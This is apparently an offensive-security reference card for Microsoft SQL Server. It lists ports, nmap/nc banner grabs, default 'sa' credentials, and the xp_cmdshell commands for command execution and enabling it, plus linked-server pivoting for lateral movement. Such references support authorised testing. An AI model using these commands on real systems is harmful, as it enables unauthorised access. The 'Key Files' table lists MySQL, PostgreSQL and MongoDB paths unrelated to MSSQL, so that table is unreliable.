MSSQL
MSSQLSQL ServerMicrosoft SQL DB
Microsoft SQL Server is a relational database. Weak SA credentials, xp_cmdshell RCE, and linked server abuse are common attack vectors.
Ports
| Port | Protocol | Description |
|---|---|---|
| 1433 | tcp | MSSQL |
| 1434 | udp | MSSQL browser |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
/etc/mysql/mysql.cnf | MySQL client configuration |
/var/lib/mysql/mysql/user.MYD | MySQL user table data |
postgresql.conf | PostgreSQL configuration file |
pg_hba.conf | PostgreSQL client authentication rules |
mongod.conf | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
sa | (empty) | SQL Server system admin |
sa | Password123 | Common test password |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
— | Auth | Weak SA password / default SA creds |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Impersonate SA | sqsh -S <target> -U sa | Connect as sysadmin |
| xp_cmdshell RCE | EXEC xp_cmdshell 'whoami' | RCE via xp_cmdshell |
| Linked Server | EXEC sp_linkedservers | Pivot through linked servers |
Notes
xp_cmdshell is disabled by default in modern SQL Server. Enable it with:
`EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`
Linked servers in AD environments are a goldmine for lateral movement.
Tools: `sqsh`, `impacket-mssqlclient`, `netexec mssql`.
Seen on
ShodanCensysFOFAZoomEye
References